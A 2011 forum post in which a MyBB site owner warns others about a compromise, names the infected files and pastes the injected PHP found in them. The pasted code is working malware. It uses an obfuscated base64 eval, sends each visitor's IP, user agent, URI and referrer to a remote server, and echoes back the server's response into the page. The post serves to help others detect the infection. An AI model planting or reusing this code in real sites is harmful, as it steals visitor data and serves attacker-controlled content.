2011-10-29, 02:13 AM
Hi
Found out today that my site was infected, because of the security issue with mybb. I fixed it with the new patch and removed all the effected code.
Just want to let everybody know, that this is something else as an iframe infection and if you think you are infected check this pages:
index.php
chat/index.php
admin/index.php
showthread.php
This is the code that i found in the bottom of all the index.php pages.
Found out today that my site was infected, because of the security issue with mybb. I fixed it with the new patch and removed all the effected code.
Just want to let everybody know, that this is something else as an iframe infection and if you think you are infected check this pages:
index.php
chat/index.php
admin/index.php
showthread.php
This is the code that i found in the bottom of all the index.php pages.
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>